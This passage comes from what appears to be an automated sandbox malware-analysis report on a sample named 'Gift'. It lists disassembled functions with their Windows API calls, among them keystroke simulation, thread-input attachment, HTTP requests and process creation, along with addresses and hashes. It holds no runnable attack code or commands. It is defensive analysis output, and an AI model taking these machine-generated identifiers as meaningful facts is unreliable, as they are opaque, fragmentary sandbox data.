                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                          • String ID:
                                                                          • API String ID: 2395222682-0
                                                                          • Opcode ID: 22df5bc39b8c78da6d9dbaa6327779b3ddcc394f77a171b22fe16b45caf3a41a
                                                                          • Instruction ID: fb6767ac9dc113e9d61a1d117ba8932d97c5fbbbd5e59e44e655e1d195d5574a
                                                                          • Opcode Fuzzy Hash: 22df5bc39b8c78da6d9dbaa6327779b3ddcc394f77a171b22fe16b45caf3a41a
                                                                          • Instruction Fuzzy Hash: 75C14471608305AFD705DF64C885A6BB7E9FF89308F00491EF98A9B261DB71ED05CB52
                                                                          Function 003319CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 003319EF
                                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00330A67,?,00000001), ref: 00331A03
                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00331A0A
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00330A67,?,00000001), ref: 00331A19
                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00331A2B
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00330A67,?,00000001), ref: 00331A44
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00330A67,?,00000001), ref: 00331A56
                                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00330A67,?,00000001), ref: 00331A9B
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00330A67,?,00000001), ref: 00331AB0
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00330A67,?,00000001), ref: 00331ABB
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                          • String ID:
                                                                          • API String ID: 2156557900-0
                                                                          • Opcode ID: a9a8737e589727742256e87e306ad91db331956f305faad92a4217008ea81c30
                                                                          • Instruction ID: 7e570d1069bb7813b05b37bd0b1a4df4cb4d6bba72c9fc822374a7b2308ea5d7
                                                                          • Opcode Fuzzy Hash: a9a8737e589727742256e87e306ad91db331956f305faad92a4217008ea81c30
                                                                          • Instruction Fuzzy Hash: 4D31E471522204BFDB17DF14EC85F7B77AEEB95316F128116F801C6190DBB59D408B60
                                                                          Function 0030C0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSysColor.USER32(00000008), ref: 002D260D
                                                                          • SetTextColor.GDI32(?,000000FF), ref: 002D2617
                                                                          • SetBkMode.GDI32(?,00000001), ref: 002D262C
                                                                          • GetStockObject.GDI32(00000005), ref: 002D2634
                                                                          • GetClientRect.USER32(?), ref: 0030C0FC
                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0030C113
                                                                          • GetWindowDC.USER32(?), ref: 0030C11F
                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0030C12E
                                                                          • ReleaseDC.USER32(?,00000000), ref: 0030C140
                                                                          • GetSysColor.USER32(00000005), ref: 0030C15E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                          • String ID:
                                                                          • API String ID: 3430376129-0
                                                                          • Opcode ID: 3c15a3f90f3fdbe8831ecc097e0586942310476641b90cb5b50d312f13b6dc3f
                                                                          • Instruction ID: d3a3c8138e44f2da43f8bad10615c28c99a26c3d6b63b9103c6073771c2b96ce
                                                                          • Opcode Fuzzy Hash: 3c15a3f90f3fdbe8831ecc097e0586942310476641b90cb5b50d312f13b6dc3f
                                                                          • Instruction Fuzzy Hash: D611BE31110205FFDB265FB4EC0ABEA7BB9EB19321F108261FA66941E1CBB10D60EF10
                                                                          Function 002DAD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 002DADE1
                                                                          • OleUninitialize.OLE32(?,00000000), ref: 002DAE80
                                                                          • UnregisterHotKey.USER32(?), ref: 002DAFD7
                                                                          • DestroyWindow.USER32(?), ref: 00312F64
                                                                          • FreeLibrary.KERNEL32(?), ref: 00312FC9
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00312FF6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                          • String ID: close all
                                                                          • API String ID: 469580280-3243417748
                                                                          • Opcode ID: 64961ffe08adcd148fc39deb767f833c97cb2f408ce3bcf686e6e81af1a07481
                                                                          • Instruction ID: cdf88965ee96d4fb8a53dae5171754b94c726e5a242727d6b2dcfb3d984ac057
                                                                          • Opcode Fuzzy Hash: 64961ffe08adcd148fc39deb767f833c97cb2f408ce3bcf686e6e81af1a07481
                                                                          • Instruction Fuzzy Hash: 3BA16F707112128FCB2AEF14C595E6AF3A4FF08740F5142ADE90AAB351CB31AD66CF91
                                                                          Function 0032AD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • EnumChildWindows.USER32(?,0032B13A), ref: 0032B078
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ChildEnumWindows
                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                          • API String ID: 3555792229-1603158881
                                                                          • Opcode ID: c83f83ec79d652945561658d4fdd14ab3d9b0b1a7449409d1782adfaffcdeb47
                                                                          • Instruction ID: 6e7341379ab44749e46a37df42c5aaf422fe217a0aedc66ec5aca05fb98f08a3
                                                                          • Opcode Fuzzy Hash: c83f83ec79d652945561658d4fdd14ab3d9b0b1a7449409d1782adfaffcdeb47
                                                                          • Instruction Fuzzy Hash: F791F970500A25EBDB1AEF60D881BEEFB75FF04340F508129E95AA7152DF306969CBA1
                                                                          Function 002D31F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowLongW.USER32(?,000000EB), ref: 002D327E
                                                                            • Part of subcall function 002D218F: GetClientRect.USER32(?,?), ref: 002D21B8
                                                                            • Part of subcall function 002D218F: GetWindowRect.USER32(?,?), ref: 002D21F9
                                                                            • Part of subcall function 002D218F: ScreenToClient.USER32(?,?), ref: 002D2221
                                                                          • GetDC.USER32 ref: 0030D073
                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0030D086
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0030D094
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0030D0A9
                                                                          • ReleaseDC.USER32(?,00000000), ref: 0030D0B1
                                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0030D13C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                          • String ID: U
                                                                          • API String ID: 4009187628-3372436214
                                                                          • Opcode ID: d2d54a7134f1e5e339536bf0668b44bd425a67bb3e0e852a3134f3bc3e2284b6
                                                                          • Instruction ID: f9f2473b9d9cfac3f45de544196e7985225a4f2ceb37af700d36254db7cf251e
                                                                          • Opcode Fuzzy Hash: d2d54a7134f1e5e339536bf0668b44bd425a67bb3e0e852a3134f3bc3e2284b6
                                                                          • Instruction Fuzzy Hash: D9710030805205EFCF26CFA4C895ABA7BB9FF49320F14426AED595A2A6C7318C51DF61
                                                                          Function 0035C634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002D29E2: GetWindowLongW.USER32(?,000000EB), ref: 002D29F3
                                                                            • Part of subcall function 002D2714: GetCursorPos.USER32(?), ref: 002D2727
                                                                            • Part of subcall function 002D2714: ScreenToClient.USER32(003977B0,?), ref: 002D2744
                                                                            • Part of subcall function 002D2714: GetAsyncKeyState.USER32(00000001), ref: 002D2769
                                                                            • Part of subcall function 002D2714: GetAsyncKeyState.USER32(00000002), ref: 002D2777
                                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0035C69C
                                                                          • ImageList_EndDrag.COMCTL32 ref: 0035C6A2
                                                                          • ReleaseCapture.USER32 ref: 0035C6A8
                                                                          • SetWindowTextW.USER32(?,00000000), ref: 0035C752
                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0035C765
                                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0035C847
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                          • API String ID: 1924731296-2107944366
                                                                          • Opcode ID: c6e355420139dfed3d5817007d767898ff7e4deb32a6a2791022ed66d90adfae
                                                                          • Instruction ID: 14352d31b42a7fff54939477211008bcf0a341852bc3586deabf0a2e0b22190d
                                                                          • Opcode Fuzzy Hash: c6e355420139dfed3d5817007d767898ff7e4deb32a6a2791022ed66d90adfae
                                                                          • Instruction Fuzzy Hash: 3851AE70118304AFDB16EF14CC5AF6A77E5EB84314F00891AF995872E1CB71A958CF52
                                                                          Function 003420E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0034211C
                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00342148
                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0034218A
                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0034219F
                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003421AC
                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003421DC
                                                                          • InternetCloseHandle.WININET(00000000), ref: 00342223
                                                                            • Part of subcall function 00342B4F: GetLastError.KERNEL32(?,?,00341EE3,00000000,00000000,00000001), ref: 00342B64
                                                                            • Part of subcall function 00342B4F: SetEvent.KERNEL32(?,?,00341EE3,00000000,00000000,00000001), ref: 00342B79
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                          • String ID:
                                                                          • API String ID: 2603140658-3916222277
                                                                          • Opcode ID: 0f153682b0d3f9d117e6b51f09ae3df64d87bdef5102b2edf84d3645a5cac294
                                                                          • Instruction ID: 6370b73002df7bf11f4a974ba2daa5ac4861c4bb3e6c1e2f263bad8d61e25278
                                                                          • Opcode Fuzzy Hash: 0f153682b0d3f9d117e6b51f09ae3df64d87bdef5102b2edf84d3645a5cac294
                                                                          • Instruction Fuzzy Hash: A7415DB1501218BFEB179F50CC8AFBB7BACEF08354F408116FA05AE151D7B0AE549BA1
                                                                          Function 00349330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00360980), ref: 00349412
                                                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00360980), ref: 00349446
                                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 003495C0
                                                                          • SysFreeString.OLEAUT32(?), ref: 003495EA
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                          • String ID:
                                                                          • API String ID: 560350794-0
                                                                          • Opcode ID: e5cf6ac52f6123143428e94e8997bfea12a988165f0cf027ed4bfa40e0035b0e
                                                                          • Instruction ID: 3d9b9d9d8d881e6ab1f00636afd7bdd2c6bc231b796a149af7be4cbb103ddf64
                                                                          • Opcode Fuzzy Hash: e5cf6ac52f6123143428e94e8997bfea12a988165f0cf027ed4bfa40e0035b0e
                                                                          • Instruction Fuzzy Hash: 01F12A71A00219EFCB16DF94C884EAEB7B9FF49314F118499F506AF261DB31AE45CB90
                                                                          Function 0034FD7D Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0034FD9E
                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0034FF31
                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0034FF55
                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0034FF95
                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0034FFB7
                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00350133
                                                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00350165
                                                                          • CloseHandle.KERNEL32(?), ref: 00350194
                                                                          • CloseHandle.KERNEL32(?), ref: 0035020B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                          • String ID:
                                                                          • API String ID: 4090791747-0
                                                                          • Opcode ID: f975f3e133089c80e30f2c1cb2f6d54151ce373b7304459ef062f119e39d5dfd
                                                                          • Instruction ID: ada121a8383e47704eef954f66bb0b02c696e2305fab71af4c7060ca1b14e3f3
                                                                          • Opcode Fuzzy Hash: f975f3e133089c80e30f2c1cb2f6d54151ce373b7304459ef062f119e39d5dfd
                                                                          • Instruction Fuzzy Hash: 00E1B131204341DFC71AEF24C891A6ABBE5AF85354F19886DF9859F2A2CB31EC45CF52
                                                                          Function 0033527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00334BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00333B8A,?), ref: 00334BE0
                                                                            • Part of subcall function 00334BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00333B8A,?), ref: 00334BF9
                                                                            • Part of subcall function 00334FEC: GetFileAttributesW.KERNEL32(?,00333BFE), ref: 00334FED
                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 003352FB
                                                                          • _wcscmp.LIBCMT ref: 00335315
                                                                          • MoveFileW.KERNEL32(?,?), ref: 00335330
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 793581249-0
                                                                          • Opcode ID: 40df2a3e11fcaea317460cb5cda8d7e81f66f572bac3b2e98e0c98811c05f492
                                                                          • Instruction ID: 9c222951c7a18f6a0c7c25d6d76b665b3e27f8d39b0dbcfca50533d3ee2059f5
                                                                          • Opcode Fuzzy Hash: 40df2a3e11fcaea317460cb5cda8d7e81f66f572bac3b2e98e0c98811c05f492
                                                                          • Instruction Fuzzy Hash: A35186B20087859BC725DBA0D8819DFB3EC9F84341F50492EF685D7152EF74A688CB66
                                                                          Function 00358C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00358D24
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: InvalidateRect
                                                                          • String ID:
                                                                          • API String ID: 634782764-0
                                                                          • Opcode ID: 76d20b515df33c7875a1801b3e3923fe7d4c571f3713537ae41a02751d1c6a3c
                                                                          • Instruction ID: 5a91f15e1b50a778bd722db94f873b0f62631c3f9fa3d16d20cc0b35a0e18b47
                                                                          • Opcode Fuzzy Hash: 76d20b515df33c7875a1801b3e3923fe7d4c571f3713537ae41a02751d1c6a3c
                                                                          • Instruction Fuzzy Hash: 9D51B130601204BFEB269F24CC8AF597BB8EB15352F244512FD15FA1F1CB71A9988A90
                                                                          Function 002D2F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0030C638
                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0030C65A
                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0030C672
                                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0030C690
                                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0030C6B1
                                                                          • DestroyIcon.USER32(00000000), ref: 0030C6C0
                                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0030C6DD
                                                                          • DestroyIcon.USER32(?), ref: 0030C6EC
                                                                            • Part of subcall function 0035AAD4: DeleteObject.GDI32(00000000), ref: 0035AB0D
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                          • String ID:
                                                                          • API String ID: 2819616528-0
                                                                          • Opcode ID: 3b1988086a6d686e8289bf4ccbe12ad2b470a26768446dee244e01277c010837
                                                                          • Instruction ID: 528c4b76785ef4b4329ef88d05799ab141342141ff6bb030ce7243d58777f585
                                                                          • Opcode Fuzzy Hash: 3b1988086a6d686e8289bf4ccbe12ad2b470a26768446dee244e01277c010837
                                                                          • Instruction Fuzzy Hash: EC51AE70620209EFDB25DF24CC96BAA77B9EB54310F104A19F942D76E0D7B1EC60DB60
                                                                          Function 0032A226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0032B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0032B54D
                                                                            • Part of subcall function 0032B52D: GetCurrentThreadId.KERNEL32 ref: 0032B554
                                                                            • Part of subcall function 0032B52D: AttachThreadInput.USER32(00000000,?,0032A23B,?,00000001), ref: 0032B55B
                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0032A246
                                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0032A263
                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0032A266
                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0032A26F
                                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0032A28D
                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0032A290
                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0032A299
                                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0032A2B0
                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0032A2B3
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
